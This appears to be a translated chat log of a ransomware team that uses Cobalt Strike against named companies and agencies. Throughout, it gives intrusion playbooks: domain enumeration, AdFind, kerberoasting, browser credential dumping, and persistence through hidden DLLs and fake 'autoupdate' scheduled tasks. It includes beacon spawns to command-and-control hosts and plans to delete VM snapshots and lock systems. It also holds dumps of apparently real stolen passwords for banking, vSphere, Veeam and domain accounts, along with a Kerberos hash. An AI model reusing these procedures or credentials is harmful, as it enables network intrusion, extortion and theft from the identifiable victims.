we're figuring out hydra
sccy
say what you're busy with, without the + )
-
we'll be bruting
everyone in sccy?
+
+
sccy
who is busy with what?
here
= )

On entry we have an ordinary bot with user privileges, and we look at the first stage of work from that context.
1. Collect information about the domain controllers in the network and check domain visibility
- net domain_controllers
- net dclist
- shell nltest /dclist:
Most often the first of the three commands is enough, but if it returns nothing, try the others.
2. Collect information about the makeup of Active Directory with AdFind.exe
- upload adfind.exe and adf.bat to a writable folder
- cd the Cobalt beacon into that folder
- run shell adf.bat
- wait for the script to finish
- download the result and delete what was uploaded to the machine

wrote it based on your guide )
yeah, I got it
I could move adfind + sharefind up to the first points
and the rest of the crap
I wrote this with skipping AV labs in mind
so as to jump over quickly if an accessible admin share turns up
can be done periodically
shell type C:\path\output.txt
then look at it through the beacon
if sharefinder takes a long time
that's in words, I'll write it out in commands now

ENTRY POINT guide
1. Collect initial information about the domain and the environment
- Domain name
- DCs list
- LA\DA\EA
- Password policy
- PS
- EDR
- system info
Based on the info obtained we judge what kind of network is in front of us: a workgroup with VPN, an AV lab, a working network. If no conclusion can be drawn from the data in step 1, go to step 2
2.
Collect information about AD
- ADFind
- ADFind trust
If the files total more than 40 MB, they must be put in an archive. After analyzing AD we conclude what type of network it is. If it is a workgroup without domain visibility, skip it and take the next network. If it is a full network, go further.
3. Collect additional information about the domain and the environment
- Dump browsers
- Seatbelt
- kerberoast, asreproast
- DuzzleUP
- WinPEAS
- Watson
- GPP
- ShareFinder
All files produced in the process and the logs go into a folder named after the network's external domain, under names matching the utilities you ran. Hashes for bruting go to team lead 2.
4. Additional actions. While ShareFinder is running we set up persistence on the entry point (ONLY IF THIS WAS AGREED IN ADVANCE)
- generate a NEW build for EACH run
- hide the DLL in user folders (preferably appdata and as deep as possible)
- run it, check that the DLL was not deleted and that the scheduled task appeared, write to me: hostname, privileges it runs with
All files are duplicated into the channel and also put into a separate folder locally.

there is, of course
a hell of a screwup
yes
oh
got 10 min?
do you realize what a screwup that is?
and they found them in vCenter, damn )))
they simply weren't touched in the lock
as I understood, through those ESXi
and didn't you read how they recovered?
wow
they're looking for SSH access to ESXi + Rubrik
yeah, any plans to hit the hospital again? ))
ok
I sent you the hash here and wrote there so that you'd look here )
well yeah, I didn't write anything else )
well, I did write
so the hash goes to brute
what exactly should I check?
ok, sec
to brute, please
```
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*Administrator$activedirectory.fishusa.com$MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com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amAccountName       : Administrator
DistinguishedName    : CN=Administrator,CN=Users,DC=activedirectory,DC=fishusa,DC=com
ServicePrincipalName : MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com:55423
```
lol
good night
go ahead
and ok ))))
simply renamed hook.jar to Hook.jar
no
I'll be there tomorrow )
anyway
no strength left, going to sleep
so
java
```
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:Hook.jar -jar cobaltstrike.jar $*
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
```
will you resend it...?
now
damn, in short
well yes
into the channel there
and the artifact, fixed with the kit
with the hook
new cobalt
I did send it
damn
is this on java 12?
under those conditions how do you check without internet
on dl
there's 1 detect there
generate the artifact with the kit
I told you
sec, damn
7 on ours, the one in the toolspanel
73
we have 1 detect at all
so why fewer?
and here the dep got caught (
and fewer detects even though it was active
and here its old stub wasn't caught
and where did the dep come from again?
without internet
https://dyncheck.com/scan/id/535edae924db877964d784a8713f84fc the dep's stub )
and then spread it across all workstations
no
start with the servers
and generate
only in the cobalt
is there a fresh shellcode builder?
and simply screw it up
maybe some "on duty" guys will notice an anomaly on a PC
if you wake them all up from sleep, the lock itself will take a fair amount of time
PCs there
are there any methods for working faster?
listen
http://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/
Since I've been let into the garden, I commented on some of the topics; I suggest putting my modest remarks straight into the first message so nobody has to read the whole thread
can you at least add us to the chat?
a task for both teams
today until 21:00; once you do the gpj you can leave earlier
right now you'll have active practice aimed precisely at privilege escalation; you'll run into cases where you'll have to study something new, where standard methods won't work, and those are exactly the ones that should be added systematically
I don't think the tangle is a problem, it's a relative "order" of actions after all; the question here is the shortcut, i.e. singling out the priority vectors and then the secondary and tertiary ones, i.e. those harder to exploit and encountered less often
in any case it looks tangled
because, for example, the previous version of the diagram was hard to bring into a sane form
For an infinite one you'll most likely have to move to another platform, or present it in a different form
this mindmap is essentially the basis of the whole cycle of possible actions, so it can be expanded almost infinitely )
then just develop it by vectors, indicating the vulnerabilities used (both LPE and network ones); pay attention to the MsSql vector as well
well, overall I take it you already "see" what to add? but the beginning is right, yeah
I'll do it now ))
just promise no mischief
I can give you my account
please drop a login in PM that can be used for reading )
remaster of the mind-map http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/
fresh stuff
https://www.xmind.net/download/
Until lunch we continue yesterday's task on the Mindmap and organizing the instructions :space_invader:
hi
Good morning
Good morning everyone
pcsb.org, they say
can you add me to that, what's it called, `pinellas.local`
me too?
yes, in DM
thanks
Hi
can I get a new cobalt, mine got locked, two networks were being closed there :space_invader:
hi
turned it on )
done
yes
Hi everyone
user8 needs to be turned on, he's back
hi
Hi, where is everyone?
Good afternoon
good night everyone
tomorrow by 5
but they don't go anywhere either
yes, there are Citrix admins there
users
groups - users?
or servers?
did other groups come up?
In #corp-televisa-com-mx we moved off the entry point. No DA so far; checked all the servers and machines we have access to; so far we're managing to get out of the user segment to servers
what did you get done today?
with this user you can only authenticate on the virtual labs (couldn't authenticate on other machines); checked all browsers - clean; the passwords from GPP didn't match any of the domain users; pulled the kerbs and sent them off to brute; found nothing in seatbelt (files and browser histories); on all the machines tried every elevate I have (literally all, even the UAC bypass); sharefinder didn't work anywhere
also clean
will recheck on this machine now (on the previous 2 everything is clean)
browsers?
no
not system rights?
no
are you LA?
that's what I'm asking, what else can be tried?
are there really no more options? )
then what's left is waiting for the service admin's hash (adfssvcadmin) to get bruted
yes )
and your current domain user?
once you check, report in feedback if it doesn't work
did you pull sharefinder?
on the other machines I can't escalate, the elevate kit doesn't fit, what can I try? the passwords (4 counting the current user's pass) don't fit any account
already handed everything over to brute
yes, both files
kerbs
and did you give the hashes to @tl2?
the LA passwords didn't fit, elevates didn't help; thinking of jumping to another machine and trying to escalate there
picking the local admin's password
```
Domain Controllers:

Server Name     IP Address
-----------     ----------
HSU-ADDC01      137.150.144.180
HSU-ADDC07      137.150.146.61
HSU-ADDC03-AZ   10.52.0.196
```
I'll pull it this way now
the tool chain doesn't pull ad_trust
ok
in DM @tl2
@tl1 @tl2 can I have a hash to brute
```
[*] Tasked beacon to run .NET program: SharpChromium.exe logins
[+] host called home, sent: 690231 bytes
[+] received output:
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: MichaelLee) --- URL : https://registration.tco.census.gov/myreg/change-password.jsf Username : michaellee@missme.com Password : MissRock90058 --- Chromium Credential (User: MichaelLee) --- URL : https://id-provider.tco.census.gov/nidp/saml2/sso Username : michaellee@missme.com Password : MissRock90058 --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : dm1002 Password : KPN@12th --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : dm1001 Password : KPN@12th --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : deodarmichael1 Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://web17.secureinternetbank.com/EBC_EBC1961/EBC1961.ashx Username : Password : 152994828040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 3180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 3601 Password : dm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://www.fedex.com/en-us/home.html Username : MissMe Password : Sweet90058! 
--- Chromium Credential (User: MichaelLee) --- URL : https://sdg2.mastercard.com/static/private-portal-ui/ Username : Mi Password : seoul --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : MISSMEMICHAEL Password : !Alameda4715 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willing1 Password : 0058sweet --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3031olympicmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://sellercentral.amazon.com/ap/signin Username : AndyP@missme.com Password : 4715Missme --- Chromium Credential (User: MichaelLee) --- URL : https://danceandmarvel.com/index.php/oitmain Username : michael Password : michael1234 --- Chromium Credential (User: MichaelLee) --- URL : https://identity.avalara.com/account/login Username : michaellee@missme.com Password : Miss8040* --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 355kingsleymichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.onlinelabels.com/SignIn.aspx Username : michaellee@missme.com Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://sdg2.mastercard.com/pkmslogin.form Username : Michael_Lee Password : ^RcRvMiSs90058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx 
Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : d&mmichael1 Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.amazon.com/ap/signin Username : patriciachoi@missme.com Password : graceful0619 --- Chromium Credential (User: MichaelLee) --- URL : https://www.costcobusinessdelivery.com/Logon Username : soohkim@missme.com Password : sweet7706 --- Chromium Credential (User: MichaelLee) --- URL : https://login.bigcommerce.com/login Username : lisakim@missme.com Password : RRvdrr $4715 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 2987 Password : mm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : michaelmaison Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.certify.com/Login.aspx Username : michaellee@missme.com Password : $MissRock --- Chromium Credential (User: MichaelLee) --- URL : https://login.yahoo.com/account/challenge/password Username : jclmichaellee Password : $Holy0731 --- Chromium Credential (User: MichaelLee) --- URL : https://accounts.shopify.com/login Username : michaellee@missme.com Password : MissMe8040 --- Chromium Credential (User: MichaelLee) --- URL : https://www.amazon.com/ap/signin Username : AndyP@missme.com Password : 4715Missme --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : d&mmichael1 Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : michaelmaison Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : 
https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 355kingsleymichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3031olympicmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://delsolpm.appfolio.com/connect/users/sign_in Username : michaellee@missme.com Password : young90058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://www.efax.com/myaccount/login Username : 2132323675 Password : 1260 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : Username : michaellee@missme.com Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://securedmail.bankofhope.com/securereader/login.jsf Username : michaellee@missme.com Password : spa0804? 
--- Chromium Credential (User: MichaelLee) --- URL : https://engpermits.lacity.org/public/control.cfm Username : Michael Lee Password : kingsley355 --- Chromium Credential (User: MichaelLee) --- URL : https://engpermits.lacity.org/public/control.cfm Username : michaellee@missme.com Password : kingsley355 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 2987 Password : mm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 29873180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 3180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx Username : 3601 Password : dm0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : michaelmaison Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : missmemichael1 Password : spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : heprmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : pcho94 Password : whos90058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.hanmi.com/hanmibankonline/uux.aspx Username : 
d&mmichael1 Password : Spai8040 [*] Finished Google Chrome extraction. `````` Domain Controllers: Server Name IP Address ----------- ---------- MM-DC1 192.168.1.2 MM-DC2 192.168.1.111 MM-DC3 192.168.1.214 `````` Teemo[HQ217]MichaelLee */13384|2020Dec22 01:33:58> shell net group "Domain Admins" /dom [Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain MissMe.local. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator JasonTak MEGACOM ThomasChang The command completed successfully. Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:24> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain MissMe.local. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator ServerAdmin$ ServerAdmin1$ ServerAdmin2$ The command completed successfully. Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:51> shell net localgroup Administrators [Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator megacom megacom1 MISSME\brandonsantana MISSME\Domain Admins MISSME\IT_Admins MISSME\MichaelLee thomas The command completed successfully. ``если с закрепами закончили то переходим к разборам-`` AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. 
Listo
pjfrancocru sfe16537 corp.televisa.com, context of a regular, unprivileged user
uh-huh, they're getting deleted
deleted; is there one left?
I delete right away
I just make a build and delete it after downloading
I'll say for sure
delete your latest ones
does the log keep the deleted ones?
ahyhaxmasaka
which ones?
but in the logs I see only 2 builds
you persisted 3 of them
again I don't get something
you need to break out onto another machine for persistence, which is logical
first of all we work through the ones with -
I'll persist myself, mine is ok
got it
same crap
and I only pressed interact
through inject into a neighboring process from the process list
meaning it was only possible to work with the machine in another session
for me such crashes were only cured by spawn
cobalt crashes
with interact
crashes how?
you write spawn there
cedarfinancial.local
benihana.com doesn't persist
247InTouchPCl.local has a minus; you were doing something in it, nobody else touched it
cedarfinancial.local crashes the cobalt
we're here
working
and the others are in networks
well, two with persistence
where are the other 2?
2 people working?
if the old one was removed - ok
damn, I told you @user8
killed the old one
dough sccy-lt04 sccy.com
did you hang 2 builds here?
there is
how to restart?
```
user context: dough sccy-lt04 sccy.com
Microsoft Teams autoupdate#81727   1/20/2021 6:15:52 PM   Ready
```
not this one
I'm restarting in sccy.com now
mine?
3 of them and 1 didn't arrive?
all?
uh-huh
is the dll in place?
yes
yes
did you delete the old one?
did you rebuild? )
`Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 p.`
Listo
nope
corp.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537
there is
```
user context: occdr occremote191 nk.spirit.com
Skype maintenance task#13547   1/20/2021 6:07:49 PM   Ready
```
thanks, there is
another matter
`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`
there is such a one
`CTXA715-04`
I need the external domain + type of rights (system, user), hostname
`Mitel autoupdate#82604 `
persistence is in place
well, we slipped up of course
yes, I gave out several builds and the rule wasn't cancelled + you were given access to make N of them
well, you did give out several builds, we just didn't match them up + rushed
but I've said it how many times: 1 build, 1 run
in any case we redo it quickly
what are the technical details for? you were told to do it this way, you should have asked right away...
if it's the ID then understood.... didn't know
I could have given all of you 1 dll for the domains and not bothered with the toolspanel
that's the point of generation
every build is unique, its own ID is baked into it
and what's the reason? they all beacon to the same domains anyway?
I also asked you whether you remember how this is done
I'm stunned
the dll and the schtask
and delete all the old ones
not one build is needed there but at least 4
I'll make a new build and persist now
I'm still waiting for an answer
I see in the toolspanel that the last build was made 1.5 hours ago
did you forget that it's 1 build per 1 persist?
I'll ask a very simple question
+
yes
did you persist with one and the same build...?
tell me
I got kicked out about 5 minutes ago
how long ago did you persist?
if only it would open; the cobalt gets killed right away
on interaction
drops the cobalt
not yet
this one wasn't persisted?
cedarfinancial.local
1 = `Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready`
`192.168.0.2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX`
`McAfee autoupdate#45234 20/01/2021 04:34:49 p.`
En ejecución
+
you're building for both domains, yes?
corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537
2
1
for now, yes. as for the misses, which ones are you asking about?
?
`CTXA715-04` still hasn't arrived?
does everyone have the dll in place, and the schtask too?
both miss for now
`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`
same as @user7
the cobalt hung with that session
with u9
are you persisting solo?
nk.spirit.com 10.0.0.20 occdr occremote191
any more persists?
the ones that were there before
mark the persisted ones too please
in progress, had a small snack
is anything persisted?
accordingly, where persistence didn't take, a -
ok
where it's persisted, write + as the very first character in the Note
the main thing is to persist
you can
does it matter which cobalt to persist in? can it be the entry one?
you have access to the builder
I did it before )
got it, we just didn't do it that way before
you don't intend to work with only 4 networks, do you?
it's not 1 to 1, by the way
all
I didn't get it, do we persist all networks or only our own?
only 2 networks
did anything else get persisted?
add the comments in the entry cobalt
edited the message above
in the shared cobalt, mark what has been persisted
I'm pulling AD there, you do the spawn
@user8 watch the session activity
you need to persist as many networks as possible
either further
or get rights
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!

======================
| Vendor Information |
----------------------
[Trend Micro Inc Found!
```
```
====== AntiVirus ======
Engine       : Trend Micro Apex One Antivirus
ProductEXE   : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe

Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

Engine       : Trend Micro Apex One Antivirus
ProductEXE   : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
```
what AV is that?
neither with the dll nor with the listener
in benihana.com my dll for persistence got deleted and for some reason it doesn't come into my cobalt
sccy.com
and which domain?
took a while but it arrived
not yet, or what?
most likely
that one?
`Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready `
a construct like this in the name
autoupdate#
and what is the task called?
the schtask?
yes
is the dll in place?
well yes, made a new one and persisted
did you persist with the same build?
don't see it yet
10.0.0.59 system* sccy-05
I have this domain, it's marked
taken in another session and not signed
```
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
```
we're losing work
taken or not taken, I haven't a clue
but it's empty
```
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
```
guys, I'm really asking you to mark the sessions you've taken
in work and persisted?
main.crispregional.org
I opened it
thanks
created
no, there's no channel )
if there's a channel then it can be added
persistence ok
channel?
persistence - ok
ok
there is such a one, i.e. it arrived
well dunno, there was no mark on it so I took it
there is such a one
`192.168.0.2 SYSTEM* SFE18491 CORP.TELEVISA.COM.MX`
`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P`и можно группу создать с этим доеном плзщас домен`` 10.1.111.100 jgemperline BEN1064-MGR-10 benihana.com ```и еще внешние домены пишите пожалуйста[ ](https://mediaeveryone.com/channel/general?msg=Ct9XShzSPimmfyrK5) +а, все. вижупроверь файл и штаск173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19нету такого...система имя компаили доменмне надо хостнеймэто юзер?закреп SYSTEM * CRRHORC19окей. тогда тебя не дергаем[ ](https://mediaeveryone.com/channel/general?msg=3BXgDHmQC8hAECd5s) Пока да, нужно лабо подготовить к завтрешнему дню, но я рядом)у всех ок с билдами?вдруг где будет сразу домен админоперативно соберите хеши на брут для @tl2и сделайте как у @user9щас всем перевключу модуль[ ](https://mediaeveryone.com/channel/general?msg=fypApjmJxLdv9EZf6) да, получилось@user3 ты пока не с нами от слова совсем верно?настраиваю лабыпоробуй еще разок обновить стр и сбилдитьBenjaminCallsскину сюда несколько билдов(``` { "domains": [ { "kalarada.com", "tuxomibo.com" ], { "bit": "x64", "period": 15, "lasthope": 65 } ```не помоглорелогин пробовали?дайте параметры из show?такая же хреньновые не скачатьни одной помеченой сессиигде @user3 @user7?крепим оперативно или вам тупо будет не с чем работатьи доменыв тулпанели обновили билдраскидайте сейчас закрепы на входные точкипометиля не пометил, во входной живаяникто не пометил свои сессии? 
2 people, and one of them has a dead session
you ok?
no, everyone
we're not persisting
you mean me?
cancel
only 1
so, what now?
+
yes
yes
launch from the user?
10.0.67 dough SCCY-LT04
if it drops then we keep working
send the dll pls
mcafee
```
4836 924 naPrdMgr.exe
```
then which AV?
got deleted
yes
it should be lying in the folder after launch, shouldn't it?
I don't see it among the tasks
2 min
2 min
```
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                1/21/2021 1:00:00 PM   Ready
AdobeGCInvoker-1.0                       1/21/2021 8:06:00 AM   Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM   Ready
G2MUploadTask-S-1-5-21-1989139100-303601 1/20/2021 3:47:00 PM   Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 AM  Ready
```
[ ](https://mediaeveryone.com/channel/general?msg=MnXjJmjcc5SNGbCHi)
got it?
already read it above))
without DA
[ ](https://mediaeveryone.com/channel/general?msg=g6oErPtYMLQZGn8bp)
not yet
session 173.234.155.15 192.168.37.115 https amypriest CRRHHCC4
yes
it's written to a schtask, isn't it?
[ ](https://mediaeveryone.com/channel/general?msg=wPganWRj5HC2WAB5q)
and where is that?
only the session dropped
persisted
Yes
@all anyone here?
not persisted yet?
don't forget to send the hashes to @tl2
done
can I get a conf for CRISPREGIONAL.ORG
write the session where you dropped it
you can now
[ ](https://mediaeveryone.com/channel/general?msg=9AnAuKnpThCWdiR9Y)
well, when we can persist, tell me
drop on the entry points, yes
[ ](https://mediaeveryone.com/channel/general?msg=2ySXTddqwbmCmuARP)
persistence after DA or right away?
say it out loud just in case, please
+
remember the launch rules?
the ones that are already there
we use 2 domains
because it may be that several sessions come from one network
always check the domain
the domains may change now
don't launch yet)
before launching, say where you're launching
that's why, classically, we persist the entry points
you know how to launch
you build yourselves a dll
and the last one is just 65
interval from 15 to 20
just check both domains
any questions on how to use it?
+
seen the new tool?
done
conf pls
sccy.com
I'm opening a new section in the tools for you
will take a look now
a really very good one
straight to escalation to DA and persistence
yes)
shall we sort them out?
there's one)
empty..
entry cobalt
```
192.169.6.82 https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698 9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
```
take a break for now
coordinate among yourselves, and put clarifying questions and work logs in the conf
will try
maybe we close today
let's all work on balimor then
already five
here
and where's @user9?
@user3 was off
4 for now
and how many of you are there?
I'll be working balimor, looking for NASes, backups and so on
which ones?)
yes
hi
does everyone have tasks?
Hi everyone
```
URL : https://id.sophos.com/
Username : ithelp@teng.com
Password : expFedAdm1n$
```
[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk)
one more storage, same creds
```
https://10.20.4.52/ui/#/host/storage/datastores
```
[ ](https://mediaeveryone.com/group/expfederal-com?msg=xuQ42XB7ok3LqQZp6)
`portscan 10.20.4.56`
`HOBBES\SAVDBAdm exp.FederalSAV`
see what's on the server - there is root, after all
delete the snapshots and lock the VMs themselves that are inside
what do you mean, "what to do"?
@tl2 what do we do?
and it seems it's not in AD
it's a nix server
there I see a 43 TB disk
network disks and so on
check the VM snapshots
Found this `beremote.exe`, Symantec backup
this thing isn't in AD computers
```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-vhp001.hobbes.loc/ui/
Username : root
Password : VXRail-2018
```
this one isn't accessible?
5480
[ ](https://mediaeveryone.com/group/expfederal-com?msg=2XfcWXmLos5yfgNqm)
and which pool did you scan?
doesn't work
[ ](https://mediaeveryone.com/group/expfederal-com?msg=vBgkQCXAf4mHaxmb7)
go in by IP to the full URL
yeah, accessible
```
10.20.4.56:636
10.20.4.56:514
10.20.4.56:443
10.20.4.56:389
10.20.4.56:88
10.20.4.56:80
10.20.4.56:22 (SSH-2.0-OpenSSH_7.4)
```
will try by IP
443 open?
yeah
does it resolve at all?
it was thrown from his box, go in by IP
throw it from his box then))
and did you throw a socks...?
[ ](https://mediaeveryone.com/group/expfederal-com?msg=N4pwzS2x547npWLnj)
more precisely, not the creds, it doesn't open via the link at all
no more accesses?
yep, nix
```
>operatingSystemServicePack: Likewise Open unknown.unknown
```
[ ](https://mediaeveryone.com/group/expfederal-com?msg=yvriitbtxRt3kXxTo)
nix, the creds don't fit
well, it should be fine everywhere, otherwise how would we work = )
almost all
yeah, and all machines with the same LA ;)
nice to see
for once correctly configured
service accounts
```
HOBBES\SVC-SpPCHIDBG001 D66pHukJG5W7RwZD8PXi
HOBBES\SpSvcApps_pchiwsg001 QGVS3bbeW03Rp7UUYIoD
```
what interesting creds they have)
```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-psc001.hobbes.loc/websso/SAML2/SSO/vsphere.local
Username : Hobbes\RamirezJ
Password : Reva:thedog2017
```
worked, thanks
```
URL : https://login.veeam.com/
Username : javier.ramirez@expFederal.com
Password : VM4l4d33n0r4l4d33n
```
try bind pipe
`USCHI-BKP110`
looks like Veeam
```
>description: Hyper-V server USCHI-VHH010.Hobbes.loc
```
```
HOBBES\RAMIREZJ Reva:thedog2017
HOBBES\SLADMIN SLTadmin2003
HOBBES\SLUSER SLTadmin2003
```
57/146 alive
`hobbes\svc-nwa001 KeysOfTheKingdom!`
10.20.32.20
vCenter 5.1 Server 2013 - PCHIAPG008.Hobbes.loc
vCenter 6.x - USCHI-VCH001.Hobbes.loc
well, it may well let us into the vCenter admin panel with the domain creds of some DA
check the FS and disks?
vcenter seems to be on windows
need to make sure the snapshots are stored there, on the same server
win
in general: ping, sort and so on
and you look at the OS
